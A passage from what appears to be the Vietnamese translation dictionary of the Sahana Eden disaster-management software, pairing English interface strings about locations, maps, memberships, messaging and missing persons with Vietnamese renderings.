3', 'Location Hierarchy Level 4 Name': 'Tên thứ tự địa điểm cấp 4', 'Location Hierarchy Level 5 Name': 'Tên thứ tự địa điểm cấp 5', 'Location Hierarchy added': 'Thứ tự địa điểm đã được thêm', 'Location Hierarchy deleted': 'Thứ tự địa điểm đã được xóa', 'Location Hierarchy updated': 'Thứ tự địa điểm đã được cập nhật', 'Location Hierarchy': 'Thứ tự địa điểm', 'Location Updated': 'Địa điểm đã được cập nhật', 'Location added': 'Địa điểm đã được thêm', 'Location deleted': 'Địa điểm đã được xóa', 'Location is Required!': 'Địa điểm được yêu cầu!', 'Location needs to have WKT!': 'Địa điểm cần để có WKT!', 'Location updated': 'Địa điểm đã được cập nhật', 'Location': 'Địa điểm', 'Locations of this level need to have a parent of level': 'Địa điểm ở cấp độ này cần có các cấp độ cha', 'Locations': 'Địa điểm', 'Log Entry Deleted': 'Ghi chép nhật ký đã được xóa', 'Log Entry Details': 'Thông tin về ghi chép nhật ký', 'Log Entry': 'Ghi chép nhật ký', 'Log New Time': 'Thời gian truy cập Mới', 'Log Time Spent': 'Thời gian đã Truy cập', 'Log entry added': 'Ghi chép nhật ký đã được thêm', 'Log entry deleted': 'Ghi chép nhật ký đã được xóa', 'Log entry updated': 'Ghi chép nhật ký đã được cập nhật', 'Log': 'Nhật ký', 'Logged Time Details': 'Thông tin về thời gian đã truy cập', 'Logged Time': 'Thời gian đã truy cập', 'Login with Facebook': 'Đăng nhập với Facebook', 'Login with Google': 'Đăng nhập với Google', 'Login': 'Đăng nhập', 'Logistics & Warehouse': 'Hậu cần & Nhà kho', 'Logo of the organization. This should be a png or jpeg file and it should be no larger than 400x400': 'Biểu trưng của một tổ chức phải là tệp png hay jpeg and không lớn hơn 400x400', 'Logo': 'Biểu tượng', 'Logout': 'Thoát', 'Long Name': 'Tên đầy đủ', 'Long Text': 'Đoạn văn bản dài', 'Long-term': 'Dài hạn', 'Longitude is Invalid!': 'Kinh độ không hợp lệ', 'Longitude is West - East (sideways). Longitude is zero on the prime meridian (Greenwich Mean Time) and is positive to the east, across Europe and Asia. Longitude is negative to the west, across the Atlantic and the Americas.': 'Kinh độ trải dài theo hướng Đông-Tây. Kinh tuyến không nằm trên kinh tuyến gốc (Greenwich Mean Time) hướng về phía đông, vắt ngang châu Âu và châu Á.', 'Longitude is West - East (sideways).': 'Kinh độ Tây - Đông (đường ngang)', 'Longitude is West-East (sideways).': 'Kinh độ Tây - Đông (đường ngang)', 'Longitude is zero on the prime meridian (Greenwich Mean Time) and is positive to the east, across Europe and Asia. Longitude is negative to the west, across the Atlantic and the Americas.': 'Kinh độ là 0 tại đường kinh tuyến đầu tiên (Thời gian vùng Greenwich) và có giá trị dương sang phía đông, qua Châu Âu và Châu Á. Kinh tuyến có giá trị âm sang phía tây, từ Đại Tây Dương qua Châu Mỹ.', 'Longitude is zero on the prime meridian (through Greenwich, United Kingdom) and is positive to the east, across Europe and Asia. Longitude is negative to the west, across the Atlantic and the Americas.': 'Kinh độ là 0 tại đường kinh tuyến đầu tiên (xuyên qua Greenwich, Anh) và có giá trị dương sang phía đông, qua châu Âu và Châu Á. Kinh tuyến có giá trị âm sang phía tây qua Đại Tây Dương và Châu Mỹ.', 'Longitude must be between -180 and 180.': 'Kinh độ phải nằm giữa -180 và 180', 'Longitude of Map Center': 'Kinh độ trung tâm bản đồ của vùng quan tâm', 'Longitude of far eastern end of the region of interest.': 'Kinh độ phía đông điểm cuối của vùng quan tâm', 'Longitude of far western end of the region of interest.': 'Kinh độ phía tây điểm cuối của vùng quan tâm', 'Longitude should be between': 'Kinh độ phải từ giữa', 'Longitude': 'Kinh độ', 'Looting': 'Nạn cướp bóc', 'Lost Password': 'Mất mật khẩu', 'Lost': 'Mất', 'Low': 'Thấp', 'MEDIAN': 'ĐIỂM GIỮA', 'MGRS Layer': 'Lớp MGRS', 'MODERATE': 'TRUNG BÌNH', 'MY REPORTS': 'BÁO CÁO CỦA TÔI', 'Magnetic Storm': 'Bão từ trường', 'Mailing List Details': 'Thông tin danh sách gửi thư', 'Mailing List Name': 'Tên danh sách gửi thư', 'Mailing Lists': 'Danh sách gửi thư', 'Mailing list added': 'Danh sách gửi thư đã được thêm', 'Mailing list deleted': 'Danh sách gửi thư đã được xóa', 'Mailing list updated': 'Danh sách gửi thư đã được cập nhật', 'Mailing list': 'Danh sách gửi thư', 'Main Duties': 'Nhiệm vụ chính', 'Mainstreaming DRR': 'GTRRTH Chính thống', 'Major Damage': 'Thiệt hại lớn', 'Major outward damage': 'Vùng ngoài chính hỏng', 'Major': 'Chuyên ngành', 'Make Commitment': 'Làm một cam kết', 'Make New Commitment': 'Làm một cam kết Mới', 'Make Request': 'Đặt yêu cầu', 'Make a Request for Aid': 'Tạo yêu cầu cứu trợ', 'Make a Request': 'Tạo yêu cầu', 'Male': 'Nam', 'Manage Layers in Catalog': 'Quản lý Lớp trong danh mục', 'Manage Returns': 'Quản lý hàng trả lại', 'Manage Sub-Category': 'Quản lý Tiêu chí phụ', 'Manage Teams Data': 'Quản lý dữ liệu đội TNV', 'Manage Users & Roles': 'Quản lý Người sử dụng & Vai trò', 'Manage Volunteer Data': 'Quản lý dữ liệu TNV', 'Manage Your Facilities': 'Quản lý bộ phận của bạn', 'Manage office inventories and assets.': 'Quản lý tài sản và thiết bị văn phòng', 'Manage volunteers by capturing their skills, availability and allocation': 'Quản ly tình nguyện viên bằng việc nắm bắt những kĩ năng, khả năng và khu vực hoạt động của họ', 'Managing material and human resources together to better prepare for future hazards and vulnerabilities.': 'Quản lý nguồn lực để chuẩn bị tốt hơn cho hiểm họa trong tương lai và tình trạng dễ bị tổn thương.', 'Managing, Storing and Distributing Relief Items.': 'Quản lý, Lưu trữ và Quyên góp hàng cứu trợ', 'Mandatory. In GeoServer, this is the Layer Name. Within the WFS getCapabilities, this is the FeatureType Name part after the colon(:).': 'Bắt buộc. Trong máy chủ về Địa lý, đây là tên Lớp. Trong lớp WFS theo Khả năng là đường dẫn, đây là phần Tên loại chức năng sau dấu hai chấm (:).', 'Mandatory. The URL to access the service.': 'Trường bắt buộc. URL để đăng nhập dịch vụ', 'Manual Synchronization': 'Đồng bộ hóa thủ công', 'Manual synchronization completed.': 'Đồng bộ hóa thủ công đã hoàn tất', 'Manual synchronization scheduled - refresh page to update status.': 'Đồng bộ hóa thủ công đã được đặt lịch - làm mới trang để cập nhật tình trạng', 'Manual synchronization started in the background.': 'Đồng bộ hóa thủ công đã bắt đầu ở nền móng', 'Map Center Latitude': 'Vĩ độ trung tâm bản đồ', 'Map Center Longitude': 'Kinh độ trung tâm bản đồ', 'Map Profile added': 'Cấu hình bản đồ đã được thêm', 'Map Profile deleted': 'Cấu hình bản đồ đã được xóa', 'Map Profile updated': 'Cấu hình bản đồ đã được cập nhật', 'Map Profile': 'Cấu hình bản đồ', 'Map Profiles': 'Cấu hình bản đồ', 'Map Height': 'Chiều cao bản đồ', 'Map Service Catalog': 'Catalogue bản đồ dịch vụ', 'Map Settings': 'Cài đặt bản đồ', 'Map Viewing Client': 'Người đang xem bản đồ', 'Map Width': 'Độ rộng bản đồ', 'Map Zoom': 'Phóng to thu nhỏ Bản đồ', 'Map from Sahana Eden': 'Bản đồ từ Sahana Eden', 'Map not available: No Projection configured': 'Bản đồ không có: Chưa có dự đoán được cài đặt', 'Map not available: Projection %(projection)s not supported - please add definition to %(path)s': 'Bản đồ không có: Dự đoán %(projection)s không được hỗ trỡ - xin thêm khái niệm đến %(path)s', 'Map of Communties': 'Bản đồ cộng đồng', 'Map of Hospitals': 'Bản đồ bệnh viện', 'Map of Incident Reports': 'Bản đồ báo cáo sự cố', 'Map of Offices': 'Bản đồ văn phòng', 'Map of Projects': 'Bản đồ dự án', 'Map of Warehouses': 'Bản đồ kho hàng', 'Map': 'Bản đồ', 'Map': 'Bản đồ', 'Marine Security': 'An ninh hàng hải', 'Marital Status': 'Tình trạng hôn nhân', 'Marker Details': 'Thông tin công cụ đánh dấu', 'Marker Levels': 'Cấp độ công cụ đánh dấu', 'Marker added': 'Công cụ đánh dấu đã được thêm', 'Marker deleted': 'Công cụ đánh dấu đã được xóa', 'Marker updated': 'Công cụ đánh dấu đã được cập nhật', 'Marker': 'Công cụ đánh dấu', 'Markers': 'Công cụ đánh dấu', 'Married': 'Đã kết hôn', 'Master Message Log to process incoming reports & requests': 'Kiểm soát log tin nhắn để xử lý báo cáo và yêu cầu gửi đến', 'Master Message Log': 'Nhật ký tin nhắn chính', 'Master': 'Chủ chốt', 'Master Degree or Higher': 'Trên đại học', 'Match Requests': 'Phù hợp với yêu cầu', 'Match?': 'Phù hợp?', 'Matching Catalog Items': 'Mặt hàng trong danh mục phù hợp', 'Matching Items': 'Mặt hàng phù hợp', 'Matching Records': 'Hồ sơ phù hợp', 'Maternal, Newborn and Child Health': 'CSSK Bà mẹ, trẻ sơ sinh và trẻ em', 'Matrix of Choices (Only one answer)': 'Ma trận lựa chọn (chỉ chọn một câu trả lời)', 'Maximum Location Latitude': 'Vĩ độ tối đa của địa điểm', 'Maximum Location Longitude': 'Kinh độ tối đa của địa điểm', 'Maximum Weight': 'Khối lượng tối đa', 'Maximum must be greater than minimum': 'Giá trị tối đa phải lớn hơn giá trị tối thiểu', 'Maximum': 'Tối đa', 'Mean': 'Trung bình', 'Measure Area: Click the points around the polygon & end with a double-click': 'Đo diện tích: Bấm chuột vào điểm của khu vực cần đo & kết thúc bằng nháy đúp chuột', 'Measure Length: Click the points along the path & end with a double-click': 'Đo Chiều dài: Bấm chuột vào điểm dọc đường đi & kết thúc bằng nháy đúp chuột', 'Media': 'Truyền thông', 'Median Absolute Deviation': 'Độ lệch tuyệt đối trung bình', 'Median': 'Điểm giữa', 'Medical Conditions': 'Tình trạng sức khỏe', 'Medical Services': 'Dịch vụ y tế', 'Medium': 'Trung bình', 'Member Base Development': 'Phát triển cơ sở hội viên', 'Member Details': 'Thông tin về hội viên', 'Member ID': 'Tên truy nhập của hội viên', 'Member added to Group': 'Thành viên nhóm đã được thêm', 'Member added to Team': 'Thành viên Đội/Nhóm đã thêm', 'Member added': 'Hội viên đã được thêm', 'Member deleted': 'Hội viên đã được xóa', 'Member removed from Group': 'Nhóm hội viên đã được xóa', 'Member updated': 'Hội viên đã được cập nhật', 'Member': 'Hội viên', 'Members': 'Hội viên', 'Membership Details': 'Thông tin về nhóm hội viên', 'Membership Fee': 'Phí hội viên', 'Membership Paid': 'Hội viên đã đóng phí', 'Membership Type Details': 'Thông tin về loại hình nhóm hội viên', 'Membership Type added': 'Loại hình nhóm hội viên đã được thêm', 'Membership Type deleted': 'Loại hình nhóm hội viên đã được xóa', 'Membership Type updated': 'Loại hình nhóm hội viên đã được cập nhật', 'Membership Types': 'Loại hình nhóm hội viên', 'Membership updated': 'Nhóm hội viên đã được cập nhật', 'Membership': 'Nhóm hội viên', 'Memberships': 'Nhóm hội viên', 'Message Details': 'Chi tiết tin nhắn', 'Message Parser settings updated': 'Cài đặt cú pháp tin nhắn đã được cập nhật', 'Message Source': 'Nguồn tin nhắn', 'Message Variable': 'Biến tin nhắn', 'Message added': 'Tin nhắn đã được thêm ', 'Message deleted': 'Tin nhắn đã được xóa', 'Message updated': 'Tin nhắn đã được cập nhật', 'Message variable': 'Biến tin nhắn', 'Message': 'Tin nhắn', 'Messages': 'Tin nhắn', 'Messaging': 'Soạn tin nhắn', 'Metadata Details': 'Chi tiết siêu dữ liệu', 'Metadata added': 'Đã thêm dữ liệu', 'Metadata': 'Lý lịch dữ liệu', 'Meteorite': 'Thiên thạch', 'Middle Name': 'Tên đệm', 'Migrants or ethnic minorities': 'Dân di cư hoặc dân tộc thiểu số', 'Milestone Added': 'Mốc thời gian quan trọng đã được thêm', 'Milestone Deleted': 'Mốc thời gian quan trọng đã được xóa', 'Milestone Details': 'Thông tin về mốc thời gian quan trọng', 'Milestone Updated': 'Mốc thời gian quan trọng đã được cập nhật', 'Milestone': 'Mốc thời gian quan trọng', 'Milestones': 'Mốc thời gian quan trọng', 'Minimum Location Latitude': 'Vĩ độ tối thiểu của địa điểm', 'Minimum Location Longitude': 'Kinh độ tối thiểu của địa điểm', 'Minimum': 'Tối thiểu', 'Minor Damage': 'Thiệt hại nhỏ', 'Minute': 'Phút', 'Minutes must be a number.': 'Giá trị của phút phải bằng chữ số', 'Minutes must be less than 60.': 'Giá trị của phút phải ít hơn 60', 'Missing Person Details': 'Chi tiết về người mất tích', 'Missing Person Reports': 'Báo cáo số người mất tích', 'Missing Person': 'Người mất tích', 'Missing Persons Report': 'Báo cáo số người mất tích', 'Missing Persons': 'Người mất tích', 'Missing Senior Citizen': 'Người già bị mất tích', 'Missing Vulnerable Person': 'Người dễ bị tổn thương mất tích', 'Missing': 'Mất tích', 'Mobile Phone Number': 'Số di động', 'Mobile Phone': 'Số di động', 'Mobile': 'Di động', 'Mode': 'Phương thức', 'Model/Type': 'Đời máy/ Loại', 'Modem settings updated': 'Cài đặt mô đem được đã được cập nhật', 'Modem': 'Mô đem', 'Moderator': 'Điều tiết viên', 'Modify Feature: Select the feature you wish to deform & then Drag one of the dots to deform the feature in your chosen manner': 'Sửa đổi tính năng: Lựa chọn tính năng bạn muốn để thay đổi và sau đó kéo vào một trong điểm để thay đổi tính năng theoh bạn chọn', 'Modify Information on groups and individuals': 'Thay đổi thông tin của nhóm và cá nhân', 'Module Administration': 'Quản trị Mô-đun', 'Monday': 'Thứ Hai', 'Monetization Details': 'Thông tin lưu hành tiền tệ', 'Monetization Report': 'Báo cáo lưu hành tiền tệ', 'Monetization': 'Lưu hành tiền tệ', 'Monitoring and Evaluation': 'Đánh giá và Giám sát', 'Month': 'Tháng', 'Monthly': 'Hàng tháng', 'Months': 'Tháng', 'More Options': 'Mở rộng chức năng', 'Morgue': 'Phòng tư liệu', 'Morgues': 'Phòng tư liệu', 'Moustache': 'Râu quai nón', 'Move Feature: Drag feature to desired location': 'Di chuyển tính năng: Kéo tính năng tới vị trí mong muốn', 'Multi-Option': 'Đa lựa chọn', 'Multiple Matches': 'Nhiều kết quả phù hợp', 'Multiple': 'Nhiều', 'Muslim': 'Tín đồ Hồi giáo', 'Must a location have a parent location?': 'Một địa danh cần phải có địa danh trực thuộc đi kèm?', 'My Logged Hours': 'Thời gian truy cập của tôi', 'My Open Tasks': 'Nhiệm vụ của tôi', 'My Profile': 'Hồ sơ của tôi', 'My Tasks': 'Nhiệm vụ của tôi', 'My reports': 'Báo cáo của tôi', 'N/A': 'Không xác định', 'NDRT (National Disaster Response Teams)': 'Đội ứng phó thảm họa cấp TW', 'NO': 'KHÔNG', 'NUMBER_GROUPING': 'SỐ_THEO NHÓM', 'NZSEE Level 1': 'Mức 1 NZSEE', 'NZSEE Level 2': 'Mức 2 NZSEE', 'Name and/or ID': 'Tên và/hoặc tên truy nhập', 'Name field is required!': 'Bắt buộc phải điền Tên!', 'Name of Award': 'Tên phần thưởng', 'Name of Driver': 'Tên tài xế', 'Name of Father': 'Tên cha', 'Name of Institute': 'Trường Đại học/ Học viện', 'Name of Mother': 'Tên mẹ', 'Name of Storage Bin Type.': 'Tên loại Bin lưu trữ', 'Name of the person in local language and script (optional).': 'Tên theo ngôn ngữ và chữ viết địa phương (tùy chọn)', 'Name of the repository (for you own reference)': 'Tên của kho (để bạn tham khảo)', 'Name': 'Tên', 'National ID Card': 'Chứng minh nhân dân', 'National NGO': 'Các tổ chức phi chính phủ ', 'National Societies': 'Hội Quốc gia', 'National Society / Branch': 'Trung ương/ Tỉnh, thành Hội', 'National Society Details': 'Thông tin về Hội Quốc gia', 'National Society added': 'Hội Quốc gia đã được thêm', 'National Society deleted': 'Hội Quốc gia đã được xóa', 'National Society updated': 'Hội Quốc gia đã được cập nhật', 'National Society': 'Hội QG', 'Nationality of the person.': 'Quốc tịch', 'Nationality': 'Quốc tịch', 'Nautical Accident': 'Tai nạn trên biển', 'Nautical Hijacking': 'Cướp trên biển', 'Need to configure Twitter Authentication': 'Cần thiết lập cấu hình Xác thực Twitter', 'Need to select 2 Locations': 'Cần chọn 2 vị trí', 'Need to specify a location to search for.': 'Cần xác định cụ thể một địa điểm để tìm kiếm', 'Need to specify a role!': 'Yêu cầu xác định vai trò', 'Needs Maintenance': 'Cần bảo dưỡng', 'Never': 'Không bao giờ', 'New Annual Budget created': 'Ngân sách hàng năm mới đã được tạo', 'New Certificate': 'Chứng chỉ mới', 'New Checklist': 'Checklist mới', 'New Entry in Asset Log': 'Ghi chép mới trong nhật ký tài sản', 'New Entry': 'Hồ sơ mới', 'New Job Title': 'Chức vụ công việc mới', 'New Organization': 'Tổ chức mới', 'Add Output': 'Kết quả đầu ra mới', 'New Post': 'Bài đăng mới', 'New Record': 'Hồ sơ mới', 'New Request': 'Yêu cầu mới', 'New Role': 'Vai trò mới', 'New Stock Adjustment': 'Điều chỉnh mới về kho hàng', 'New Support Request': 'Yêu cầu hỗ trợ mới', 'New Team': 'Đội/Nhóm mới', 'New Theme': 'Chủ đề mới', 'New Training Course': 'Khóa tập huấn mới', 'New Training Event': 'Khóa tập huấn mới', 'New User': 'Người sử dụng mới', 'New': 'Thêm mới', 'News': 'Tin tức', 'Next View': 'Hiển thị tiếp', 'Next run': 'Lần chạy tiếp theo', 'Next': 'Trang sau', 'No Activities Found': 'Không tìm thấy hoạt động nào', 'No Activity Types Found': 'Không tìm thấy loại hình hoạt động nào', 'No Addresses currently registered': 'Hiện tại chưa đăng ký Địa chỉ', 'No Affiliations defined': 'Không xác định được liên kết nào', 'No Aid Requests have been made yet': 'Chưa có yêu cầu cứu trợ nào được tạo', 'No Alternative Items currently registered': 'Hiện không có mặt hàng thay thế nào được đăng ký', 'No Assessment Answers': 'Không có câu trả lời cho đánh giá', 'No Assessment Questions': 'Không có câu hỏi đánh giá', 'No Assessment Templates': 'Không có mẫu đánh giá', 'No Assessments currently registered': 'Chưa đăng ký trị giá tính thuế', 'No Assets currently registered': 'Hiện không có tài sản nào được đăng ký', 'No Awards found': 'Không tìm thấy thônng tin về khen thưởng', 'No Base Layer': 'Không có lớp bản đồ cơ sở', 'No Beneficiaries Found': 'Không tìm thấy người hưởng lợi nào', 'No Beneficiary Types Found': 'Không tìm thấy nhóm người hưởng lợi nào', 'No Branch Organizations currently registered': 'Hiện không có tổ chức cơ sở nào được đăng ký', 'No Brands currently registered': 'Hiện không có nhãn hàng nào được đăng ký', 'No Catalog Items currently registered': 'Hiện không có mặt hàng nào trong danh mục được đăng ký', 'No Catalogs currently registered': 'Hiện không có danh mục nào được đăng ký', 'No Category<>Sub-Category<>Catalog Relation currently registered': 'Hiện tại chưa có Category<>Sub-Category<>Catalog Relation được đăng ký', 'No Clusters currently registered': 'Hiện không có nhóm nào được đăng ký', 'No Commitment Items currently registered': 'Hiện không có hàng hóa cam kết nào được đăng ký', 'No Commitments': 'Không có cam kết nào', 'No Communities Found': 'Không tìm thấy cộng đồng nào', 'No Completed Assessment Forms': 'Không có mẫu khảo sát đánh giá hoàn thiện nào', 'No Contacts Found': 'Không tìm thấy liên lạc nào', 'No Data currently defined for this Theme Layer': 'Hiện không xác định được dữ liệu nào cho lớp chủ đề này', 'No Data': 'Không có dữ liệu', 'No Disaster Assessments': 'Không có đánh giá thảm họa nào', 'No Distribution Items currently registered': 'Chưa đăng ký danh sách hàng hóa đóng góp', 'No Documents found': 'Không tìm thấy tài liệu nào', 'No Donors currently registered': 'Hiện không có nhà tài trợ nào được đăng ký', 'No Emails currently in InBox': 'Hiện không có thư điện tử nào trong hộp thư đến', 'No Entries Found': 'Không có hồ sơ nào được tìm thấy', 'No Facilities currently registered': 'Hiện không có trang thiết bị nào được đăng ký', 'No Facility Types currently registered': 'Không có bộ phận nào được đăng ký', 'No Feature Layers currently defined': 'Hiện không xác định được lớp đặc điểm nào', 'No File Chosen': 'Chưa chọn File', 'No Flood Reports currently registered': 'Chưa đăng ký báo cáo lũ lụt', 'No Frameworks found': 'Không tìm thấy khung chương trình nào', 'No Groups currently defined': 'Hiện tại không xác định được nhóm', 'No Groups currently registered': 'Hiện không có nhóm nào được đăng ký', 'No Hazards currently registered': 'Hiện không có hiểm họa nào được đăng ký', 'No Hospitals currently registered': 'Chưa có bệnh viện nào đăng ký', 'No Human Resources currently assigned to this incident': 'Hiện không có nhân sự nào được phân công cho công việc này', 'No Identities currently registered': 'Hiện không có nhận diện nào được đăng ký', 'No Image': 'Không có ảnh', 'No Images currently registered': 'Hiện không có hình ảnh nào được đăng ký', 'No Incident Reports currently registered': 'Hiện không có báo cáo sự việc nào được đăng ký', 'No Incidents currently registered': 'Chưa sự việc nào được đưa lên', 'No Inventories currently have suitable alternative items in stock': 'Hiện không có bảng kiểm kê nào có mặt hàng thay thế trong kho', 'No Inventories currently have this item in stock': 'Hiện không có bảng kiểm kê nào có mặt hàng này trong kho', 'No Item Categories currently registered': 'Hiện không có nhóm mặt hàng nào được đăng ký', 'No Item Packs currently registered': 'Hiện không có gói hàng nào được đăng ký', 'No Items currently registered': 'Hiện không có mặt hàng nào được đăng ký', 'No Items currently requested': 'Hiện tại không có hàng hóa nào được yêu cầu', 'No Kits': 'Không có thùng hành nào', 'No Layers currently configured in this Profile': 'Hiện không có lớp nào được tạo ra trong hồ sơ này', 'No Layers currently defined in this Symbology': 'Hiện không xác định được lớp nào trong biểu tượng này', 'No Layers currently defined': 'Hiện không xác định được lớp nào', 'No Location Hierarchies currently defined': 'Hiện không xác định được thứ tự địa điểm', 'No Locations Found': 'Không tìm thấy địa điểm nào', 'No Locations currently available': 'Hiện không có địa điểm', 'No Locations currently registered': 'Hiện tại chưa có vị trí nào được đăng ký', 'No Mailing List currently established': 'Hiện không có danh sách địa chỉ thư nào được thiết lập', 'No Map Profiles currently defined': 'Hiện không xác định được cài đặt cấu hình bản đồ nào', 'No Markers currently available': 'Hiện không có dấu mốc nào', 'No Match': 'Không phù hợp', 'No Matching Catalog Items': 'Không có mặt hàng nào trong danh mục phù hợp', 'No Matching Items': 'Không có mặt hàng phù hợp', 'No Matching Records': 'Không có hồ sơ phù hợp', 'No Members currently registered': 'Hiện không có hội viên nào được đăng ký', 'No Memberships currently defined': 'Chưa xác nhận đăng ký thành viên', 'No Messages currently in Outbox': 'Hiện không có thư nào trong hộp thư đi', 'No Metadata currently defined': 'Hiện tại không xác định được loại siêu dữ liệu', 'No Milestones Found': 'Không tìm thấy sự kiện quan trọng nào', 'No Office Types currently registered': 'Hiện không có loại hình văn phòng nào được đăng ký', 'No Offices currently registered': 'Hiện không có văn phòng nào được đăng ký', 'No Open Tasks for %(project)s': 'Không có công việc chưa được xác định nào cho %(project)s', 'No Orders registered': 'Không có đề nghị nào được đăng ký', 'No Organization Domains currently registered': 'Không có lĩnh vực hoạt động của tổ chức nào được đăng ký', 'No Organization Types currently registered': 'Hiện không có loại hình tổ chức nào được đăng ký', 'No Organizations currently registered': 'Hiện không có tổ chức nào được đăng ký', 'No Organizations for Project(s)': 'Không có tổ chức cho dự án', 'No Organizations found for this Framework': 'Không tìm thấy tổ chức trong chương trình khung này', 'No Packs for Item': 'Không có hàng đóng gói', 'No Partner Organizations currently registered': 'Hiện không có tổ chức đối tác nào được đăng ký', 'No People currently committed': 'Hiện không có người nào cam kết', 'No People currently registered in this shelter': 'Không có người đăng ký cư trú ở đơn vị này', 'No Persons currently registered': 'Hiện không có người nào đăng ký', 'No Persons currently reported missing': 'Hiện tại không thấy báo cáo về người mất tích', 'No Photos found': 'Không tìm thấy hình ảnh', 'No PoIs available.': 'Không có PoIs', 'No Presence Log Entries currently registered': 'Hiện chư có ghi chép nhật ký được đăng ký', 'No Professional Experience found': 'Không tìm thấy kinh nghiệm nghề nghiệp', 'No Profiles currently have Configurations for this Layer': 'Hiện không có hồ sơ nào có cài đặt cấu hình cho lớp này', 'No Projections currently defined': 'Hiện không xác định được trình diễn nào', 'No Projects currently registered': 'Hiện không có dự án nào được đăng ký', 'No Question Meta-Data': 'Không có siêu dữ liệu lớn câu hỏi', 'No Ratings for Skill Type': 'Không xếp loại cho loại kỹ năng', 'No Received Shipments': 'Không có chuyến hàng nào được nhận', 'No Records currently available': 'Hiện tại không có hồ sơ nào sẵn có', 'No Red Cross & Red Crescent National Societies currently registered': 'Hiện không có Hội Chữ thập đỏ và Trăng lưỡi liềm đỏ quốc gia nào được đăng ký', 'No Request Items currently registered': 'Hiện không có mặt hàng đề nghị nào được đăng ký', 'No Requests': 'Không có đề nghị', 'No Roles defined': 'Không có vai trò nào được xác định ', 'No Rooms currently registered': 'Hiện không có phòng nào được đăng ký', 'No Search saved': 'Không có tìm kiếm nào được lưu', 'No Sectors currently registered': 'Hiện không có lĩnh vực nào được đăng ký', 'No Sent Shipments': 'Không có chuyến hàng nào được gửi', 'No Settings currently defined': 'Hiện không có cài đặt nào được xác định', 'No Shelters currently registered': 'Hiện tại chưa đăng ký nơi cư trú', 'No Shipment Items': 'Không có hàng hóa vận chuyển nào', 'No Shipment Transit Logs currently registered': 'Không có số liệu lưu về vận chuyển được ghi nhận', 'No Skill Types currently set': 'Chưa cài đặt loại kỹ năng', 'No Skills currently requested': 'Hiện không có kỹ năng nào được đề nghị', 'No Staff currently registered': 'Hiện không có cán bộ nào được đăng ký', 'No Statuses currently registered': 'Hiện không có tình trạng nào được đăng ký', 'No Stock currently registered in this Warehouse': 'Hiện không có hàng hóa nào được đăng ký trong nhà kho này', 'No Stock currently registered': 'Hiện không có hàng hóa nào được đăng ký', 'No Storage Bin Type currently registered': 'Chưa đăng ký Loại Bin lưu trữ', 'No Suppliers currently registered': 'Hiện không có nhà cung cấp nào được đăng ký', 'No Support Requests currently registered': 'Hiện tại không có yêu cầu hỗ trợ nào được đăng ký', 'No Survey Questions currently registered': 'Hiện tại không có câu hỏi khảo sát nào được đăng ký', 'No Symbologies currently defined for this Layer': 'Hiện không xác định được biểu tượng nào cho lớp này', 'No Symbologies currently defined': 'Hiện không xác định được biểu tượng nào', 'No Tasks Assigned': 'Không có công việc nào được giao', 'No Teams currently registered': 'Hiện không có Đội/Nhóm nào được đăng ký', 'No Template Sections': 'Không có phần về biểu mẫu', 'No Themes currently registered': 'Hiện không có chủ đề nào được đăng ký', 'No Tickets currently registered': 'Hiện tại chưa đăng ký Ticket ', 'No Time Logged': 'Không có thời gian nào được ghi lại', 'No Twilio Settings currently defined': 'Hiện không có cài đặt Twilio nào được xác định', 'No Units currently registered': 'Chưa đăng ký tên đơn vị', 'No Users currently registered': 'Hiện không có người sử dụng nào được đăng ký', 'No Vehicles currently assigned to this incident': 'Hiện không có phương tiện vận chuyển nào được điều động cho sự việc này', 'No Volunteer Cluster Positions': 'Không có vị trí của nhóm tình nguyện viên', 'No Volunteer Cluster Types': 'Không có loại hình nhóm tình nguyện viên', 'No Volunteer Clusters': 'Không có nhóm tình nguyện viên', 'No Volunteers currently registered': 'Hiện không có tình nguyện viên nào được đăng ký', 'No Warehouses currently registered': 'Hiện không có nhà kho nào được đăng ký', 'No access at all': 'Không truy cập', 'No access to this record!': 'Không tiếp cận được bản lưu này!', 'No annual budgets found': 'Không tìm thấy bản ngân sách năm', 'No contact information available': 'Không có thông tin liên hệ', 'No contact method found': 'Không tìm thấy cách thức liên hệ', 'No contacts currently registered': 'Chưa đăng ký thông tin liên lạc', 'No data available in table': 'Không có dữ liệu trong bảng', 'No data available': 'Không có dữ liệu sẵn có', 'No data in this table - cannot create PDF!': 'Không có dữ liệu trong bảng - không thể tạo file PDF', 'No databases in this application': 'Không có cơ sở dữ liệu trong ứng dụng này', 'No demographic data currently available': 'Hiện không xác định được dữ liệu nhân khẩu', 'No demographic sources currently defined': 'Hiện không xác định được nguồn nhân khẩu', 'No demographics currently defined': 'Hiện không xác định được số liệu thống kê dân số', 'No education details currently registered': 'Hiện không có thông tin về học vấn được đăng ký', 'No entries currently available': 'Hiện chưa có hồ sơ nào', 'No entries found': 'Không có hồ sơ nào được tìm thấy', 'No entry available': 'Chưa có hồ sơ nào', 'No file chosen': 'Chưa chọn file', 'No forms to the corresponding resource have been downloaded yet.': 'Không tải được mẫu nào cho nguồn tài nguyên tương ứng', 'No further users can be assigned.': 'Không thể phân công thêm người sử dụng', 'No items currently in stock': 'Hiện không có mặt hàng nào trong kho', 'No items have been selected for shipping.': 'Không có mặt hàng nào được lựa chọn để vận chuyển', 'No jobs configured yet': 'Chưa thiết lập công việc', 'No jobs configured': 'Không thiết lập công việc', 'No linked records': 'Không có bản thu liên quan', 'No location information defined!': 'Không xác định được thông tin về địa điểm!', 'No match': 'Không phù hợp', 'No matching element found in the data source': 'Không tìm được yếu tố phù hợp từ nguồn dữ liệu', 'No matching records found': 'Không tìm thấy hồ sơ phù hợp', 'No matching result': 'Không có kết quả phù hợp', 'No membership types currently registered': 'Hiện không có loại hình hội viên nào được đăng ký', 'No messages in the system': 'Không có thư nào trong hệ thống', 'No offices registered for organisation': 'Không có văn phòng nào đăng ký tổ chức', 'No options available': 'Không có lựa chọn sẵn có', 'No outputs defined': 'Không tìm thấy đầu ra', 'No pending registrations found': 'Không tìm thấy đăng ký đang chờ', 'No pending registrations matching the query': 'Không tìm thấy đăng ký khớp với yêu cầu', 'No problem group defined yet': 'Chưa xác định được nhóm gặp nạn', 'No records in this resource': 'Không có hồ sơ nào trong tài nguyên mới', 'No records in this resource. Add one more records manually and then retry.': 'Không có hồ sơ nào trong tài nguyên này. Thêm một hoặc nhiều hồ sơ một cách thủ công và sau đó thử lại ', 'No records to delete': 'Không có bản thu để xóa', 'No records to review': 'Không có hồ sơ nào để rà soát', 'No report available.': 'Không có báo cáo', 'No reports available.': 'Không có báo cáo nào', 'No repositories configured': 'Không có chỗ chứa hàng nào được tạo ra', 'No requests found': 'Không tìm thấy yêu cầu', 'No resources configured yet': 'Chưa có nguồn lực nào được tạo ra', 